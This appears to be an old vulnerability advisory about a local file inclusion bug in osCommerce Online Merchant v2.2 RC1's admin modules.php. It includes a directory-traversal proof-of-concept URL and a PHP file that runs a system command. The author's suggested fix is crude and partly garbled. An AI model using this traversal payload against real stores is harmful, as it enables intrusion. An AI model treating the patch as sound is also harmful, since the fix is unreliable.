|
osCommerce Online Merchant v2.2 RC1 local include bug
SEVERITY:
=========
Normal
SOFTWARE:
=========
osCommerce Online Merchant v2.2 RC1
http://oscommerce.com/
INFO:
=====
osCommerce is an Open Source based online shop e-commerce solution that is available for free under
the GNU General Public License
DESCRIPTION:
============
osCommerce has a local inclusion bug in the modules.php file:
http://127.0.0.1/oscommerce-2.2rc1/catalog/admin/modules.php?module_directory=../
../../&file=test.php
Where test.php contains:
<?php
system("dir");
?>
VENDOR STATUS:
==============
Vendor was contacted but no response received till date.
MY FIX:
=======
Put:
if(preg_match("/\.\./i", $module_directory)){echo "HACKING attempt !";exit(0);}
$module_directory = preg_replace("/[\/]/i","(/)",
$module_directory);
$module_directory = ereg_replace("[\*]","(\)",
$module_directory);
Before:
include(DIR_FS_CATALOG_LANGUAGES . $language . '/modules/' . $module_type . '/' . $file);
include($module_directory . $file);
This vulnerability was discovered by matrix_killer
mail : matrix_k at abv.bg
Greets: EcLiPsE, Bl0od3r and Acid_BDS
-----------------------------------------------------------------
С бензин в кръвта!
http://auto-motor-und-sport.bg/
|
